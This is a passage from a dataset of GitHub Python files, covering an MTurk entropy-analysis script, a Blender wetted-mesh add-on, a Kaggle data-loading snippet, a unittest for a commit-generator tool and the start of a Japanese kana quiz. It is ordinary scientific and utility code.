AssignmentStatuses=['Approved','Submitted'])\n # for i in answer['Assignments']:\n # result = i[\"Answer\"]\n # result = html.unescape(\"AssignmentId: \"+i[\"AssignmentId\"] + \"&WorkerId: \" + i[\"WorkerId\"] + \"&Answer: \" + result[result.find(\"\")+len(\"\"):result.find(\"\")] +\"\\n\")\n # submitted_result.write(result)\n\n # file.close()\n # submitted_result.close()\n\n analyse_resultV2()\n\n\ndef analyse_resultV2():\n # To count number of system error\n nb_error = 0\n\n if test != \"gambling\":\n if test == \"simple\":\n rate = []\n number_try = (\n []\n ) # number of tries for an index, number_try[0] means first characters\n list_repeating_letter = [] # list of answer that have bunch of repeating letter\n repeating_letter_cpt = 0 #\n list_guess = []\n nb_ppl_answer = []\n cpt_nb_ppl = 0\n list_plot = []\n somme = 0\n else:\n list_sentence = [] # to store sentence that are already retrieved\n bad_result = [] # to store bad result submitted by worker\n dict_answer = (\n {}\n ) # key = the sentence, value = list of dict of character and their percentage\n # the first element is the occurance of the sentence\n if test == \"gambling\":\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n submitted_result = (\n open(\n prefix + \"Submitted_result/submitted_result\" + wave_number + \".txt\", \"r\"\n )\n .read()\n .split(\"\\n\")[:-1]\n )\n else:\n # file = open(prefix+\"HIT_list.txt\",\"r\")\n submitted_result = (\n open(prefix + \"Submitted_result/submitted_result.txt\", \"r\")\n .read()\n .split(\"\\n\")[:-1]\n )\n\n ####### Storing result in list #######\n # result represent one answer\n for result in submitted_result:\n tmp = result.split(\"&\")\n if test != \"gambling\":\n length = len(tmp[2]) - len(\"Answer: \")\n if length == 0:\n nb_error += 1\n continue\n nb_ppl_answer.append(length)\n # print(tmp)\n if test == \"simple\":\n # print(tmp[2])\n rate.append(\n sum(int(x) for x in tmp[3] if x != \"\\n\") / nb_ppl_answer[cpt_nb_ppl]\n )\n # list_guess.append(tmp[3])\n number_try = itertools.zip_longest(number_try, list(tmp[3]), fillvalue=\"2\")\n number_try = map(\",\".join, number_try)\n # print(list(number_try))\n for i in range(1, len(tmp[4])):\n if tmp[4][i] == tmp[4][i - 1]:\n repeating_letter_cpt += 1\n else:\n repeating_letter_cpt = 0\n if repeating_letter_cpt > 6:\n repeating_letter_cpt = 0\n list_repeating_letter.append(result)\n break\n cpt_nb_ppl += 1\n elif test == \"hard\":\n # print(tmp[3])\n # print(type(tmp[3]))\n # number_try += collections.Counter(map(int,tmp[3].split(\",\")))\n # list_guess.append(list(map(int,tmp[3].split(\",\"))))\n number_try = itertools.zip_longest(\n number_try, tmp[3].split(\",\"), fillvalue=\"0\"\n )\n number_try = map(\",\".join, number_try)\n # print(list(number_try))\n else:\n error_cpt = 0 # counter for errors\n answer = tmp[4].split(\"|\") # answer represent the percentage of bet\n answer.pop()\n\n if wave_number == \"1\":\n list_capital = [1.0]\n else:\n temp = json.loads(\n open(\n prefix\n + \"Submitted_result/mean_result\"\n + str(int(wave_number) - 1)\n + \".txt\",\n \"r\",\n ).read()\n )\n if tmp[2][len(\"Answer: \") :] in temp:\n list_capital = [temp[tmp[2][len(\"Answer: \") :]][1][-1]]\n else:\n continue\n\n # Count there is how much answer for a sentence\n if tmp[2][len(\"Answer: \") :] not in dict_answer:\n dict_answer[tmp[2][len(\"Answer: \") :]] = [1]\n else:\n dict_answer[tmp[2][len(\"Answer: \") :]][0] += 1\n\n for i in answer:\n tmp2 = i.split(\",\")\n tmp_list = []\n tmp_dict = {}\n tmp_list.append(tmp2[0]) # the right character\n for i in range(1, len(tmp2)):\n # else:\n tmp_dict[tmp2[i][0]] = float(\n tmp2[i][1:]\n ) # separate the letter and the percentage, \"A\":50\n tmp_list.append(tmp_dict)\n # print(list_capital[-1])\n if tmp_list[0] in tmp_list[1]:\n list_capital.append(\n 27 * list_capital[-1] * tmp_list[1][tmp_list[0]] / 100.0\n )\n # list_capital *= tmp_list[1][tmp_list[0]]/100.0\n else:\n list_capital.append(list_capital[-1] * 0.01)\n error_cpt = error_cpt + 1\n # list_capital *= 0.01\n if (\n error_cpt > 2\n ): # We don't consider the answer if the error is greater than a treshold\n # print(tmp[2][len(\"Answer: \"):])\n dict_answer[tmp[2][len(\"Answer: \") :]][0] -= 1\n continue\n\n # print(list_capital)\n list_capital.pop(0)\n if len(dict_answer[tmp[2][len(\"Answer: \") :]]) == 1:\n dict_answer[tmp[2][len(\"Answer: \") :]].append(list_capital)\n else:\n dict_answer[tmp[2][len(\"Answer: \") :]][1] = list(\n map(\n operator.add,\n dict_answer[tmp[2][len(\"Answer: \") :]][1],\n list_capital,\n )\n )\n # print(dict_answer)\n # print(dict_answer)\n # exit()\n ####### Analysing result #######\n if test == \"simple\":\n mean = sum(rate) / len(rate)\n print(\"The mean value of answers:\", mean)\n minimum_rate = (\n mean - 0.4 * mean\n ) # If rate of an answer is less than 40% of the mean valu, we have to pay attention\n print(\"minimum:\", minimum_rate)\n\n special_attention = open(prefix + \"Submitted_result/special_attention.txt\", \"w\")\n special_attention.write(\"######## REPEATING LETTER ######## \\n\")\n special_attention.write(\"\\n\".join(list_repeating_letter))\n special_attention.write(\"\\n\\n ######## SPECIAL ATTENTION ########\\n\")\n for index, i in enumerate(rate):\n if i < minimum_rate:\n special_attention.write(submitted_result[index])\n\n special_attention.close()\n\n number_try = list(number_try)\n\n for i in number_try:\n i = collections.Counter(i.split(\",\"))\n del i[\"2\"]\n number_of_answer = sum(i.values())\n list_guess.append(\n {k: v / number_of_answer for k, v in i.items()}\n ) # On regarde que les bonne réponse\n # print(list_guess)\n for index, i in enumerate(list_guess):\n list_plot.append(-sum(np.log(prob) * prob for prob in i.values()))\n\n pyplot.plot(list_plot)\n pyplot.show()\n # print(list_guess)\n elif test == \"hard\":\n # dict_occurrence = list(set(nb_ppl_answer))\n # dict_occurrence.sort()\n # dict_occurrence = {key:sum(v>=key for v in nb_ppl_answer) for key in dict_occurrence}\n # dict_occurrence = sorted(dict_occurrence.items()) # (length of the answer, number of answer who have length more thant that)\n # print(dict_occurrence)\n\n number_try = list(\n number_try\n ) # number_try[0] means number of tries for the first character\n for i in number_try:\n i = collections.Counter(i.split(\",\"))\n del i[\"0\"] # 0 are useless\n number_of_answer = sum(i.values())\n # print(number_of_answer)\n list_guess.append({int(k): v / number_of_answer for k, v in i.items()})\n # print(len(list_guess))\n\n # # Vérifie si tous les lignes font 1\n # a=[]\n # somme = 0\n # for i in list_guess:\n # for key,value in i.items():\n # somme = somme + float(value)\n # a.append(somme)\n # somme = 0\n # print(a)\n\n # Plot h en fonction de nb de lettre\n\n list_upper = [np.log2(27)]\n list_lower = [np.log2(27)]\n\n # print(list_guess)\n for i in list_guess:\n list_upper.append((-sum(np.log(prob) * prob for prob in i.values())))\n i = collections.OrderedDict(sorted(i.items()))\n lower_freq = 0\n for cpt in range(1, 28):\n if cpt in i:\n if cpt + 1 in i:\n lower_freq += cpt * (i[cpt] - i[cpt + 1]) * np.log(cpt)\n else:\n lower_freq += cpt * i[cpt] * np.log(cpt)\n else:\n if cpt + 1 in i:\n lower_freq += cpt * -i[cpt + 1] * np.log(cpt)\n list_lower.append(lower_freq)\n\n print(len(list_upper))\n print(len(list_lower))\n # Minimizing the ansazt function\n x0 = np.array([0, 0, 0])\n x = np.arange(1, len(list_upper) + 1)\n # x = np.linspace(1,len(list_upper),len(list_upper))\n matlab = open(\"matlab.txt\", \"w\")\n matlab.write(\"[\" + \",\".join(str(x) for x in list_upper) + \"]\\n\")\n matlab.write(\"[\" + \",\".join(str(x) for x in list_lower) + \"]\")\n y_upper = np.array(list_upper)\n y_lower = np.array(list_lower)\n\n ########### Minimization with f1 ansatz ###########\n\n #### Using least_squres optimization\n res_upper = op.least_squares(\n func, x0, args=(x, y_upper), loss=\"cauchy\", f_scale=0.1\n )\n res_lower = op.least_squares(\n func, x0, args=(x, y_lower), loss=\"cauchy\", f_scale=0.1\n )\n f_upper = ansatz_least(res_upper.x, x)\n f_lower = ansatz_least(res_lower.x, x)\n print(\"res_upper:\", res_upper.x)\n print(\"res_lower:\", res_lower.x)\n pyplot.figure(1)\n pyplot.plot(list_upper, \"o\", label=\"Upper bound data\")\n pyplot.plot(list_lower, \"+\", label=\"Lower bound data\")\n pyplot.plot(\n f_upper,\n label=\"Fitted upper bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}\".format(\n res_upper.x[0], res_upper.x[1], res_upper.x[2]\n ),\n )\n pyplot.plot(\n f_lower,\n label=\"Fitted lower bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}\".format(\n res_lower.x[0], res_lower.x[1], res_lower.x[2]\n ),\n )\n pyplot.legend()\n pyplot.suptitle(\"Least squares method\")\n # pyplot.show()\n\n #### Using curve_fit optimization\n res_upper = op.curve_fit(ansatz_curve, x, y_upper)\n res_lower = op.curve_fit(ansatz_curve, x, y_lower)\n f_upper = ansatz_curve(x, *res_upper[0])\n f_lower = ansatz_curve(x, *res_lower[0])\n print(\"res_upper:\", res_upper[0])\n print(\"res_lower:\", res_lower[0])\n\n pyplot.figure(2)\n pyplot.plot(list_upper, \"o\", label=\"Upper bound data\")\n pyplot.plot(list_lower, \"+\", label=\"Lower bound data\")\n pyplot.plot(\n f_upper,\n label=\"Fitted upper bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}\".format(\n res_upper[0][0], res_upper[0][1], res_upper[0][2]\n ),\n )\n pyplot.plot(\n f_lower,\n label=\"Fitted lower bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}\".format(\n res_lower[0][0], res_lower[0][1], res_lower[0][2]\n ),\n )\n pyplot.legend()\n pyplot.suptitle(\"Curve fit method\")\n pyplot.show()\n\n else:\n tmp = dict(dict_answer)\n for i in dict_answer:\n if tmp[i][0] == 0:\n # print(i)\n del tmp[i]\n dict_answer = tmp\n for i in dict_answer:\n # print(i)\n dict_answer[i][1] = list(\n map(lambda x: x / dict_answer[i][0], dict_answer[i][1])\n )\n\n mean_result = open(\n prefix + \"Submitted_result/mean_result\" + wave_number + \".txt\", \"w\"\n )\n mean_result.write(json.dumps(dict_answer)) # use `json.loads` to do the reverse\n mean_result.close()\n\n analyse_gambling()\n\n\ndef analyse_gambling():\n answer = json.loads(\n open(prefix + \"Submitted_result/mean_result1\" + \".txt\", \"r\").read()\n )\n\n for i in range(2, int(wave_number) + 1):\n tmp = json.loads(\n open(prefix + \"Submitted_result/mean_result\" + str(i) + \".txt\", \"r\").read()\n )\n diff = set(answer) - set(tmp)\n for i in diff:\n del answer[i]\n for key, value in tmp.items():\n answer[key][1] = (\n answer[key][1] + value[1]\n ) # concat the previous capital with the following\n\n # print(answer)\n # for i in answer:\n # print(i)\n tmp = []\n for key, value in answer.items():\n tmp.append(\n [\n (1 - (1 / (n + 1)) * (np.log(s) / np.log(27))) * np.log2(27)\n for n, s in enumerate(answer[key][1])\n ]\n )\n\n print(len(tmp))\n\n list_plot = tmp[0]\n for i in range(1, len(tmp)):\n list_plot = list(map(operator.add, list_plot, tmp[i]))\n\n list_plot = list(map(lambda x: x / len(tmp), list_plot))\n print(list_plot)\n pyplot.plot(list_plot)\n # pyplot.suptitle(\"Entropy rate variation (Cover & King)\")\n pyplot.xlabel(\"Number of character\")\n pyplot.ylabel(\"Entropy rate(bits/character)\")\n # x = np.arange(1,len(list_plot)+1)\n # res = op.curve_fit(ansatz_curve,x,np.array(list_plot))\n # print(res)\n # f = ansatz_curve(x,*res[0])\n # pyplot.plot(f,label='Fitted upper bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}'.format(res[0][0], res[0][1], res[0][2]))\n pyplot.show()\n\n\ndef func(variable, x, y):\n \"\"\"function to be minimized\"\"\"\n return ansatz_least(variable, x) - y\n\n\ndef ansatz_least(variable, x):\n return variable[0] * x ** (variable[1] - 1) + variable[2]\n\n\ndef ansatz_curve(x, A, beta, h):\n return A * x ** (beta - 1) + h\n\n\nif __name__ == \"__main__\":\n # endpoint_url = \"https://mturk-requester-sandbox.us-east-1.amazonaws.com\"\n endpoint_url = \"https://mturk-requester.us-east-1.amazonaws.com\"\n\n print(\"You are using endpoint_url= \", endpoint_url)\n\n # Connecting to the account\n mturk = boto3.client(\n \"mturk\",\n aws_access_key_id=\"XXXXXXX\",\n aws_secret_access_key=\"XXXXXXXXXXX\",\n region_name=\"us-east-1\",\n endpoint_url=endpoint_url,\n )\n #'https://mturk-requester.us-east-1.amazonaws.com' -> to publish on the official site\n # \"https://mturk-requester-sandbox.us-east-1.amazonaws.com\" -> to test before publishing\n\n # Choose what kind of test we want: simple, hard, gambling\n\n window = Tk()\n window.title(\"Choose type of test\")\n\n button = Button(\n window,\n text=\"simple\",\n command=lambda: choose_test(\"simple\", window),\n compound=BOTTOM,\n height=5,\n width=15,\n )\n button.pack(side=LEFT)\n\n button2 = Button(\n window,\n text=\"hard\",\n command=lambda: choose_test(\"hard\", window),\n compound=BOTTOM,\n height=5,\n width=15,\n )\n button2.pack(side=LEFT)\n\n button3 = Button(\n window,\n text=\"Gambling wave 1\",\n command=lambda: choose_test(\"gambling\", window),\n compound=BOTTOM,\n height=5,\n width=15,\n )\n button3.pack(side=LEFT)\n\n button3 = Button(\n window,\n text=\"Gambling other wave\",\n command=lambda: choose_test(\"gambling\", window, 2),\n compound=BOTTOM,\n height=5,\n width=15,\n )\n button3.pack(side=LEFT)\n\n window.mainloop()\n\n if test == \"simple\":\n prefix = \"simple_test/\"\n question = open(\"index_simple.html\", \"r\").read()\n\n elif test == \"hard\":\n prefix = \"hard_test/\"\n question = open(\"index_hard.html\", \"r\").read()\n\n else:\n prefix = \"gambling_test/\"\n if is_First_wave == 1:\n question = open(\n \"index_gambling1.html\", \"r\"\n ).read() # HTML to render when it's the first wave\n wave_number = str(1)\n else:\n question = open(\"index_gambling2.html\", \"r\").read()\n wave_number = open(prefix + \"wave_number_file.txt\", \"r\").read()\n\n question = (\n '\\\n \\n 450 \"\n )\n\n window = Tk()\n window.title(\"Main window\")\n im = Image.open(\"plus.png\").resize((100, 100))\n render = ImageTk.PhotoImage(im)\n\n button = Button(\n window,\n text=\"Create a HIT\",\n command=lambda: add_window(window),\n compound=BOTTOM,\n height=5,\n width=10,\n ) # ,image=render)\n button.pack(side=LEFT)\n\n # button2 = Button(window,text=\"Delete a HIT\",command=lambda:add_window(window),compound=BOTTOM)#,height=255,width=255)#,image=render)\n # button2.pack(side=LEFT)\n\n button3 = Button(\n window,\n text=\"Retrieve results\",\n command=lambda: result_window(window),\n compound=BOTTOM,\n height=5,\n width=10,\n ) # ,image=render)\n button3.pack(side=LEFT)\n\n window.mainloop()\n\n # how to retrieve answer:\n # a=mturk.list_assignments_for_hit(HITId=\"HITid\")\n # a['Assignments'][0]['Answer'] Perhaps [1] or other if there are more than 1 assigment\n","repo_name":"RenGeng/Mechanical-Turk","sub_path":"MT/analyseV2.py","file_name":"analyseV2.py","file_ext":"py","file_size_in_byte":30990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70269266494","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nbl_info = {\n \"name\": \"Add Wetted Mesh\",\n \"author\": \"freejack\",\n \"version\": (0, 2, 1),\n \"blender\": (2, 5, 8),\n \"api\": 37699,\n \"location\": \"View3D > Tool Shelf > Wetted Mesh Panel\",\n \"description\": \"Adds separated fluid, dry and wetted mesh for selected pair.\",\n \"warning\": \"\",\n \"wiki_url\": \"http://wiki.blender.org/index.php/Extensions:2.5/Py/\"\\\n \"Scripts/Mesh/Wetted_Mesh\",\n \"tracker_url\": \"http://projects.blender.org/tracker/index.php?\"\\\n \"func=detail&aid=27156\",\n \"category\": \"Mesh\"}\n\nimport bpy\nimport collections\nimport math\n\n### Tool Panel ###\nclass VIEW3D_PT_tools_WettedMesh(bpy.types.Panel):\n '''Wetted Mesh Tool Panel'''\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'TOOLS'\n bl_label = 'Wetted Mesh'\n bl_context = 'objectmode'\n\n def draw(self, context):\n layout = self.layout\n col = layout.column(align=True)\n slcnt = len(context.selected_objects)\n\n if slcnt != 2:\n col.label(text = 'Select two mesh objects')\n col.label(text = 'to generate separated')\n col.label(text = 'fluid, dry and wetted')\n col.label(text = 'meshes.')\n else:\n (solid, fluid) = getSelectedPair(context)\n col.label(text = 'solid = '+solid.name)\n col.label(text = 'fluid = '+fluid.name)\n col.operator('mesh.primitive_wetted_mesh_add', text='Generate Meshes')\n\n### Operator ###\nclass AddWettedMesh(bpy.types.Operator):\n '''Add wetted mesh for selected mesh pair'''\n bl_idname = \"mesh.primitive_wetted_mesh_add\"\n bl_label = \"Add Wetted Mesh\"\n bl_options = {'REGISTER', 'UNDO'}\n statusMessage = ''\n\n def draw(self, context):\n layout = self.layout\n col = layout.column(align=True)\n col.label(text = self.statusMessage)\n\n def execute(self, context):\n # make sure a pair of objects is selected\n if len(context.selected_objects) != 2:\n # should not happen if called from tool panel\n self.report({'WARNING'}, \"no mesh pair selected, operation cancelled\")\n return {'CANCELLED'}\n\n print(\"add_wetted_mesh begin\")\n \n # super-selected object is solid, other object is fluid\n (solid, fluid) = getSelectedPair(context)\n print(\" solid = \"+solid.name)\n print(\" fluid = \"+fluid.name)\n \n # make a copy of fluid object, convert to mesh if required\n print(\" copy fluid\")\n bpy.ops.object.select_all(action='DESELECT')\n fluid.select = True\n context.scene.objects.active = fluid\n bpy.ops.object.duplicate()\n bpy.ops.object.convert(target='MESH', keep_original=False)\n bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)\n fluidCopy = context.object\n \n # substract solid from fluidCopy\n print(\" bool: fluidCopy DIFFERENCE solid\")\n bpy.ops.object.modifier_add(type='BOOLEAN')\n bop = fluidCopy.modifiers.items()[0]\n bop[1].operation = 'DIFFERENCE'\n bop[1].object = solid\n bpy.ops.object.modifier_apply(apply_as='DATA', modifier=bop[0])\n fluidMinusSolid = fluidCopy\n fluidMinusSolid.name = \"fluidMinusSolid\"\n \n # make a second copy of fluid object\n print(\" copy fluid\")\n bpy.ops.object.select_all(action='DESELECT')\n fluid.select = True\n context.scene.objects.active = fluid\n bpy.ops.object.duplicate()\n bpy.ops.object.convert(target='MESH', keep_original=False)\n bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)\n fluidCopy = context.object\n \n # make union from fluidCopy and solid\n print(\" bool: fluidCopy UNION solid\")\n bpy.ops.object.modifier_add(type='BOOLEAN')\n bop = fluidCopy.modifiers.items()[0]\n bop[1].operation = 'UNION'\n bop[1].object = solid\n bpy.ops.object.modifier_apply(apply_as='DATA', modifier=bop[0])\n fluidUnionSolid = fluidCopy\n fluidUnionSolid.name = \"fluidUnionSolid\"\n \n # index meshes\n print(\" KDTree index fluidMinusSolid\")\n fluidMinusSolidKDT = KDTree(3, fluidMinusSolid.data.vertices)\n print(\" KDTree index fluidUnionSolid\")\n fluidUnionSolidKDT = KDTree(3, fluidUnionSolid.data.vertices)\n kdtrees = (fluidMinusSolidKDT, fluidUnionSolidKDT)\n \n # build mesh face sets\n faceDict = { }\n vertDict = { }\n \n print(\" processing fluidMinusSolid faces\")\n cacheDict = { }\n setFMSfaces = set()\n numFaces = len(fluidUnionSolid.data.faces)\n i = 0\n for f in fluidMinusSolid.data.faces:\n if i % 500 == 0:\n print(\" \", i, \" / \", numFaces)\n i += 1\n fuid = unifiedFaceId(kdtrees, f, fluidMinusSolid.data.vertices, \\\n faceDict, vertDict, cacheDict)\n setFMSfaces.add(fuid)\n \n print(\" processing fluidUnionSolid faces\")\n cacheDict = { }\n setFUSfaces = set()\n numFaces = len(fluidUnionSolid.data.faces)\n i = 0\n for f in fluidUnionSolid.data.faces:\n if i % 500 == 0:\n print(\" \", i, \" / \", numFaces)\n i += 1\n fuid = unifiedFaceId(kdtrees, f, fluidUnionSolid.data.vertices, \\\n faceDict, vertDict, cacheDict)\n setFUSfaces.add(fuid)\n \n # remove boolean helpers\n print(\" delete helper objects\")\n bpy.ops.object.select_all(action='DESELECT')\n fluidUnionSolid.select = True\n fluidMinusSolid.select = True\n bpy.ops.object.delete()\n\n # wetted = FMS - FUS\n print(\" set operation FMS diff FUS\")\n setWetFaces = setFMSfaces.difference(setFUSfaces)\n print(\" build wetted mesh\")\n verts, faces = buildMesh(setWetFaces, faceDict, vertDict)\n print(\" create wetted mesh\")\n wetted = createMesh(\"Wetted\", verts, faces)\n\n # fluid = FMS x FUS\n print(\" set operation FMS intersect FUS\")\n setFluidFaces = setFMSfaces.intersection(setFUSfaces)\n print(\" build fluid mesh\")\n verts, faces = buildMesh(setFluidFaces, faceDict, vertDict)\n print(\" create fluid mesh\")\n fluid = createMesh(\"Fluid\", verts, faces)\n \n # solid = FUS - FMS\n print(\" set operation FUS diff FMS\")\n setSolidFaces = setFUSfaces.difference(setFMSfaces)\n print(\" build solid mesh\")\n verts, faces = buildMesh(setSolidFaces, faceDict, vertDict)\n print(\" create solid mesh\")\n solid = createMesh(\"Solid\", verts, faces)\n \n # parent wetted mesh\n print(\" parent mesh\")\n bpy.ops.object.add(type='EMPTY')\n wettedMesh = context.object\n solid.select = True\n fluid.select = True\n wetted.select = True\n wettedMesh.select = True\n bpy.ops.object.parent_set(type='OBJECT')\n wettedMesh.name = 'WettedMesh'\n \n print(\"add_wetted_mesh done\")\n self.statusMessage = 'created '+wettedMesh.name\n\n return {'FINISHED'}\n\n\n### Registration ###\ndef register():\n bpy.utils.register_class(VIEW3D_PT_tools_WettedMesh)\n bpy.utils.register_class(AddWettedMesh)\n\n\ndef unregister():\n bpy.utils.unregister_class(VIEW3D_PT_tools_WettedMesh)\n bpy.utils.unregister_class(AddWettedMesh)\n\nif __name__ == \"__main__\":\n register()\n\n\n#\n# KD tree (used to create a geometric index of mesh vertices)\n#\n\ndef distance(a, b):\n return (a-b).length\n\nNode = collections.namedtuple(\"Node\", 'point axis label left right')\n\nclass KDTree(object):\n \"\"\"A tree for nearest neighbor search in a k-dimensional space.\n\n For information about the implementation, see\n http://en.wikipedia.org/wiki/Kd-tree\n\n Usage:\n objects is an iterable of (co, index) tuples (so MeshVertex is useable)\n k is the number of dimensions (=3)\n \n t = KDTree(k, objects)\n point, label, distance = t.nearest_neighbor(destination)\n \"\"\"\n\n def __init__(self, k, objects=[]):\n\n def build_tree(objects, axis=0):\n\n if not objects:\n return None\n\n objects.sort(key=lambda o: o.co[axis])\n median_idx = len(objects) // 2\n median_point = objects[median_idx].co\n median_label = objects[median_idx].index\n\n next_axis = (axis + 1) % k\n return Node(median_point, axis, median_label,\n build_tree(objects[:median_idx], next_axis),\n build_tree(objects[median_idx + 1:], next_axis))\n\n self.root = build_tree(list(objects))\n self.size = len(objects)\n\n\n def nearest_neighbor(self, destination):\n\n best = [None, None, float('inf')]\n # state of search: best point found, its label,\n # lowest distance\n\n def recursive_search(here):\n\n if here is None:\n return\n point, axis, label, left, right = here\n\n here_sd = distance(point, destination)\n if here_sd < best[2]:\n best[:] = point, label, here_sd\n\n diff = destination[axis] - point[axis]\n close, away = (left, right) if diff <= 0 else (right, left)\n\n recursive_search(close)\n if math.fabs(diff) < best[2]:\n recursive_search(away)\n\n recursive_search(self.root)\n return best[0], best[1], best[2]\n\n\n#\n# helper functions\n#\n\n# get super-selected object and other object from selected pair\ndef getSelectedPair(context):\n objA = context.object\n objB = context.selected_objects[0]\n if objA == objB:\n objB = context.selected_objects[1]\n return (objA, objB)\n\n# get a unified vertex id for given coordinates\ndef unifiedVertexId(kdtrees, location, vertDict):\n eps = 0.0001\n offset = 0\n for t in kdtrees:\n co, index, d = t.nearest_neighbor(location)\n if d < eps:\n uvid = offset + index\n if uvid not in vertDict:\n vertDict[uvid] = co\n return uvid\n offset += t.size\n return -1\n\n# get a unified face id tuple\n# Stores the ordered face id tuple in faceDict\n# and the used coordinates for vertex id in vertDict.\n# cacheDict caches the unified vertex id (lookup in kdtree is expensive).\n# For each mesh (where the face belongs to) a separate cacheDict is expected.\ndef unifiedFaceId(kdtrees, face, vertices, faceDict, vertDict, cacheDict):\n fids = [ ]\n for v in face.vertices:\n uvid = cacheDict.get(v)\n if uvid == None:\n uvid = unifiedVertexId(kdtrees, vertices[v].co, vertDict)\n cacheDict[v] = uvid\n fids.append(uvid)\n ofids = tuple(fids)\n fids.sort()\n fuid = tuple(fids)\n if fuid not in faceDict:\n faceDict[fuid] = ofids\n return fuid\n\n# build vertex and face array from unified face sets\ndef buildMesh(unifiedFaceSet, faceDict, vertDict):\n verts = [ ]\n nextV = 0\n myV = { }\n faces = [ ]\n for uf in unifiedFaceSet:\n of = faceDict[uf]\n myf = [ ]\n for uV in of:\n v = myV.get(uV)\n if v == None:\n v = nextV\n myV[uV] = nextV\n verts.append(vertDict[uV])\n nextV += 1\n myf.append(v)\n faces.append(myf)\n return verts, faces\n\n# create mesh object and link to scene\ndef createMesh(name, verts, faces):\n me = bpy.data.meshes.new(name+\"Mesh\")\n ob = bpy.data.objects.new(name, me)\n ob.show_name = True\n bpy.context.scene.objects.link(ob)\n me.from_pydata(verts, [], faces)\n me.update(calc_edges=True)\n return ob\n","repo_name":"BSVino/Blender","sub_path":"release/scripts/addons_contrib/wetted_mesh.py","file_name":"wetted_mesh.py","file_ext":"py","file_size_in_byte":12599,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"78"} +{"seq_id":"71050288571","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\npath = \"../input/\"\n\nprint('load train...')\ntrain_df = pd.read_csv(path+\"train.csv\",usecols=[ 'click_time'])\nprint('load test...')\ntest_df = pd.read_csv(path+\"test.csv\", usecols=['click_time'])\n\ntrain_df.click_time.str[11:13].value_counts().sort_index()\ntest_df.click_time.str[11:13].value_counts().sort_index()\ntrain_df['hour'] = pd.to_datetime(train_df.click_time).dt.hour.astype('uint8')\ntrain_df = train_df[(train_df.hour == 4)|(train_df.hour == 5)|(train_df.hour == 9)|(train_df.hour == 10)|(train_df.hour == 13)|(train_df.hour == 14)]","repo_name":"aorursy/new-nb-1","sub_path":"baomengjiao_less-data-and-higher-score.py","file_name":"baomengjiao_less-data-and-higher-score.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7795108323","text":"import unittest\nimport contribute\nfrom subprocess import check_output\n\n\nclass TestContribute(unittest.TestCase):\n\n def test_arguments(self):\n args = contribute.arguments(['-nw'])\n self.assertTrue(args.no_weekends)\n self.assertEqual(args.max_commits, 10)\n self.assertTrue(1 <= contribute.contributions_per_day(args) <= 20)\n\n def test_contributions_per_day(self):\n args = contribute.arguments(['-nw'])\n self.assertTrue(1 <= contribute.contributions_per_day(args) <= 20)\n\n def test_commits(self):\n contribute.NUM = 11 # limiting the number only for unittesting\n contribute.main(['-nw',\n '--user_name=sampleusername',\n '--user_email=your-username@users.noreply.github.com',\n '-mc=12',\n '-fr=82',\n '-db=10',\n '-da=15'])\n self.assertTrue(1 <= int(check_output(\n ['git',\n 'rev-list',\n '--count',\n 'HEAD']\n ).decode('utf-8')) <= 20*(10 + 15))\n","repo_name":"Shpota/github-activity-generator","sub_path":"test_contribute.py","file_name":"test_contribute.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":905,"dataset":"github-code","pt":"78"} +{"seq_id":"26882702595","text":"import sys\r\nimport random\r\nfrom PyQt5.QtWidgets import QApplication, QMessageBox, QMainWindow, QLabel, QPushButton, QGridLayout, QWidget, QLineEdit\r\nfrom PyQt5.QtCore import Qt, pyqtSlot\r\nfrom PyQt5.QtGui import QFont\r\n\r\n#Global Variables\r\nHIRAGANA = ['わ','ら','や','ま','は','な','た','さ','か','あ','り','み','ひ','に','ち','し','き','い'\r\n ,'る','ゆ','む','ふ','ぬ','つ','す','く','う','ん','れ','め','へ','ね','て','せ','け','え'\r\n ,'を','ろ','よ','も','ほ','の','と','そ','こ','お','ぱ','ば','だ','ざ','が','ぴ','び','ぢ','じ','ぎ'\r\n ,'ぷ','ぶ','づ','ず','ぐ','ぺ','べ','で','ぜ','げ','ぽ','ぼ','ど','ぞ','ご']\r\n\r\nKATAKANA = ['ワ','ラ','ヤ','マ','ハ','ナ','タ','サ','カ','ア','リ','ミ','ヒ','ニ','チ','シ','キ','イ'\r\n ,'ル','ユ','ム','フ','ヌ','ツ','ス','ク','ウ','ン','レ','メ','ヘ','ネ','テ','セ','ケ','エ'\r\n ,'ヲ','ロ','ヨ','モ','ホ','ノ','ト','ソ','コ','オ','パ','バ','ダ','ザ','ガ','ピ','ビ','ヂ','ジ','ギ'\r\n ,'プ','ブ','ヅ','ズ','グ','ペ','ベ','デ','ゼ','ゲ','ポ','ボ','ド','ゾ','ゴ']\r\n\r\nSOUNDS = 